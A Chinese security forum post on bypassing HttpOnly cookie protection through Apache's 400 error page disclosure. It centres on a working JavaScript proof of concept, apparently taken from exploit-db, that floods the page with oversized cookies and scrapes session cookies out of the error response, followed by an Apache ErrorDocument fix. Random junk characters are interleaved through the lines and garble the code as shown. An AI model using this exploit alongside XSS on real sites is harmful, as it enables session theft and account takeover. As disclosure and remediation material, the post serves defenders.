很多程序以及一些商业或者成熟开源的cms文章系统为了防止xss盗取用户cookie的问题,一般都采用给cookie加上httponly的属性,来禁止直接使用js得到用户的cookie,从而降低xss的危害,而这个问题刚好可以用来绕过cookie的这个httponly的属性。9 {; J7 ]& u, D- \ w& e6 z
+ R2 \3 Y/ F3 t, r# R* ?0 y用chrome打开一个站点,F12打开开发者工具,找到console输入如下代码并回车:
: U9 i* b- |; Y- l( E
/ Q$ q3 p, o q) Q$ A$ |2 ~& }9 N7 N( n# v: M
// http://www.exploit-db.com/exploits/18442/
( v0 `) O5 M3 S3 ?3 Z/ D. Gfunction setCookies (good) {) G9 S" H' z0 r) J4 Y
// Construct string for cookie value
4 A k* r. _8 y$ }6 fvar str = "";, p5 G/ s0 w, y
for (var i=0; i< 819; i++) {' N- E, f- J4 w4 M0 d
str += "x";
: o3 ]& f# e+ p}
) t" P6 P8 m% ]4 y// Set cookies
, S# ~4 M; f% p- W6 N" y8 Cfor (i = 0; i < 10; i++) {
, a9 L+ p. V: m p9 y3 Q8 P2 a- ]// Expire evil cookie6 @0 x S7 i) V* w w
if (good) {
: F% |3 F- ~+ p2 S: D7 w: ?3 \% zvar cookie = "xss"+i+"=;expires="+new Date(+new Date()-1).toUTCString()+"; path=/;";
- }3 L/ A( X+ s2 \' _0 F/ M}
r( ]* d+ W6 @// Set evil cookie9 T( H, R7 W$ T, r0 O+ ]
else {+ _% U* d h# U9 W5 Q; e
var cookie = "xss"+i+"="+str+";path=/";7 G& X. c2 G# [
}* l- z S2 V! E# r5 ~4 h
document.cookie = cookie;- b! U4 U$ ~0 I
}* F$ |7 q* j0 Z2 J
}
; f( R- f% o0 y* Y4 jfunction makeRequest() {
7 x0 L' U4 ]8 E; w. QsetCookies();
) T: r. b) k1 k& R0 Z4 cfunction parseCookies () {/ D0 `+ A0 W0 x" t$ ? y' Z8 K
var cookie_dict = {};* v4 F! g2 ^" Y
// Only react on 400 status: z4 Q. \/ b/ {$ j! V
if (xhr.readyState === 4 && xhr.status === 400) {3 Q/ d: k9 p- a4 s! |, k( l
// Replace newlines and match <pre> content3 w1 j* v& f* ^* N% [" X$ u! R
var content = xhr.responseText.replace(/\r|\n/g,'').match(/<pre>(.+)<\/pre>/);
) [' G& A' N1 a) F3 D; xif (content.length) {9 s2 q4 ]3 k s" c g
// Remove Cookie: prefix
( O0 o( f' z# x& scontent = content[1].replace("Cookie: ", ""); u8 G$ X1 H% U& `* k7 R
var cookies = content.replace(/xss\d=x+;?/g, '').split(/;/g);
- f% ^$ a4 T7 P, W _# C// Add cookies to object0 h4 r6 y0 P; p
for (var i=0; i<cookies.length; i++) {. F& D# F$ F( d" O4 d
var s_c = cookies.split('=',2);9 ^( H$ T9 u. P4 Q' ~: a
cookie_dict[s_c[0]] = s_c[1];
8 w1 A# C5 i. P# ~" z}9 H8 E* _! d5 M) I& [1 D. z5 Z
}
# r7 R9 I- c% _, z4 P, P; M; S9 r// Unset malicious cookies
1 q N. {: k9 z2 w& |" ~setCookies(true);
! T( w: ~' Q$ y7 w% malert(JSON.stringify(cookie_dict));
2 E, b+ \7 X8 ?}
9 n; Q4 j/ B0 ?- {) M. U+ ~! l3 M}% g7 ?/ P7 @0 x
// Make XHR request; @( h r* a# _# U2 s, H# ^
var xhr = new XMLHttpRequest();) \. b( ]4 g8 E4 Z8 s, }; u7 J2 N
xhr.onreadystatechange = parseCookies;& V+ w" q1 c6 M6 W5 }( Q
xhr.open("GET", "/", true);
1 b- A" U4 D$ f; r% fxhr.send(null);# T% [0 m1 p3 s. |
}
e: j. F+ l7 hmakeRequest();* U, O$ d5 z% F8 P7 `5 B
1 j2 `9 ?/ s+ | O6 [5 J你就能看见华丽丽的400错误包含着cookie信息。
* Y0 g. b; M7 v8 ]$ {; p, a
! f/ _8 S% c7 G( F0 s下载地址:https://gist.github.com/pilate/1955a1c28324d4724b7b/download#% T. A2 m, R# i0 k$ V6 N% x
2 d# m! B6 i; ?# I5 I) S E, b修复方案:) V6 v6 P! H7 E5 p* \% _
2 \& z2 b( u/ Z" V5 C9 H6 OApache官方提供4种错误处理方式(http://httpd.apache.org/docs/2.0/mod/core.html#errordocument),如下
4 w' x" g _ n7 s0 ~% z
* t N9 _6 r# I2 k- [0 N+ vIn the event of a problem or error, Apachecan be configured to do one of four things,
- X0 }& Q, Y- p2 [ p# S) k' O$ f9 g
1. output asimple hardcoded error message输出一个简单生硬的错误代码信息5 z$ C) U$ ?2 k" h9 B5 p
2. output acustomized message输出一段信息' ^+ B* V8 L5 h5 c/ F
3. redirect to alocal URL-path to handle the problem/error转向一个本地的自定义页面
+ n5 X& t! P7 @0 T) `4. redirect to an external URL to handle theproblem/error转向一个外部URL8 Z7 d# K, K; `; l- m0 n
& T. I. C# Y; K2 q
经测试,对于400错误只有方法2有效,返回包不会再包含cookie内容% m; }8 A* O$ X2 A
! |/ z/ ]$ ^7 }! IApache配置:; J6 [1 f$ g5 O& s- w2 K- f2 P, f
& v# A. L4 ~, W+ L& J2 DErrorDocument400 " security test"7 _: L, Z6 S* N" f& A* ^
( o( a$ e' h0 Z* r) o/ a( O- g当然,升级apache到最新也可:)。8 z+ u8 @/ z! S1 N4 X7 E
; S6 @8 e% H6 |( f/ Q/ B! V% C; ?参考:http://httpd.apache.org/security/vulnerabilities_22.html
* b; Z8 F) e3 b+ o; i3 a! I: {; K$ G |/ F e4 C2 }
|